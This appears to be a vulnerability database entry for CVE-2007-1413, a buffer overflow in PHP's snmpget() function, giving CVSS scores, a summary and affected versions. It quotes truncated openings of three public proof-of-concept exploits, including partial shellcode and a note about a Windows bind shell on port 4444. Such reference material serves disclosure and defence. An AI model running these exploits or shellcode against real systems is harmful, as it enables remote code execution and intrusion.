
CVE-2007-1413

Published: 12/03/2007 Updated: 11/10/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 765
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Buffer overflow in the snmpget function in the snmp extension in PHP 5.2.3 and earlier, including PHP 4.4.6 and probably other PHP 4 versions, allows context-dependent attackers to execute arbitrary code via a long value in the third argument (object id).

Vulnerable Product

php php 4.4.6

php php

Exploits

<?php /* Inphex reference ->milw0rmcom/exploits/4204 317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm GET /scriptphp HTTP/11\n telnet 192168232 4444 Microsoft Windows XP [Version 512600] (C) Copyright 1985-2001 Microsoft Corp C:\apache> */ if (!extension_loaded("snmp")) { die("s ...
<?php // PHP 446 snmpget() object id local buffer overflow poc exploit // by rgod // site: retrogodaltervistaorg // win xp sp2 version // to be launched form the cli if (!extension_loaded("snmp")){ die("you need the snmp extension loaded"); } $____scode= "\xeb\x1b" "\x5b" "\x31\xc0" "\x50" "\x31\xc0" "\x88\x43\x59" "\x53" ...
<?php //PHP <= 523 snmpget() object id local Buffer Overflow eip overwrite exploit //bug discovered by rgod //Original advisory: retrogodaltervistaorg/php_446_snmpget_local_bofhtml //[quote="rgod"]more than 256 chars result in simple eip overwrite[/quote] //right! so here it is an exploit using eip overwrite //author: shinnai // ...